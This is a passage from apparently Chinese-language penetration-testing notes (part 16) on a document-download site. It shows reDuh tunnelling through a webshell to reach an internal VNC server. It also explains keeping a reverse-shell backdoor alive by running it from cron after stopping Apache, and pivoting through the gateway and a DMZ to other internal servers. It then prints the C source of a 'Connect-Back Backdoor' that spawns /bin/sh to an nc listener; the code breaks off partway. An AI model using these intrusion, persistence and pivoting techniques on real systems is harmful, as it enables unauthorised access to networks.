渗透笔记整理(16)

2021-04-05 04:00

ting remote RPC port to 42001. Please wait…

[InfoL]reDuhClient service listener started on local port 1010

[InfoL]Caught new service connection on port 1010

本地默认监听1010端口:

D:\Tools>nc -vv 127.0.0.1 1010

DNS fwd/rev mismatch: localhost != vitter

localhost [127.0.0.1] 1010 (?) open

Welcome to the reDuh command line

>>[createTunnel]5900:192.168.0.3:5900

Successfully bound locally to port 5900. Awaiting connections.

出现这个提示就ok了,[createTunnel]本地映射出的端口:被映射的内网ip:被映射的内网ip端口

然后就可以用vnc连接127.0.0.1的5900端口就是连攻击内网的192.168.0.3的服务器了。

18. 如何在webshell反弹后门回来后停止apache:

由 python -c ’import pty; pty.spawn(“/bin/sh”)’得到一个可以交互的shell,在有root密码的前提下可 以su,但是发现不能停止httpd,因为这个shell的父进程是httpd的,如果httpd被stop后,发现后门直接就挂了。可以crond去跑 这个后门得到shell不要用webshell跑,在这个shell里面停止httpd(因为该内网服务器段只被映射这一个ip的80端口出来,现在这个 80端口要做内网映射到网关上,可以直接远程管理设备,开DMZ之后入侵其他内网服务器)。

本地:

nc -l -p 5555

服务器上:

[root@cactiez etc]#

cat /home/www/haha.c

—————————-代码开始分割线—————————–

#include <stdio.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <unistd.h>

#include <fcntl.h>

#include <netinet/in.h>

#include <netdb.h>

int fd, sock;

int port = 5555;

struct sockaddr_in addr;

char mesg[] = ”::Connect-Back Backdoor:: CMD: ”;

char shell[] = ”/bin/sh”;

int main(int argc, char *argv[]) {

while(argc<2) {

fprintf(stderr, ” %s <ip> ”, argv[0]);

exit(0); }


渗透笔记整理(16).doc 将本文的Word文档下载到电脑 下载失败或者文档不完整,请联系客服人员解决!

下一篇:第07章_可编程接口芯片

相关阅读
本类排行
× 注册会员免费下载(下载后可以自由复制和排版)

马上注册会员

注:下载文档有可能“只有目录或者内容不全”等情况,请下载之前注意辨别,如果您已付费且无法下载或内容有问题,请联系我们协助你处理。
微信: QQ: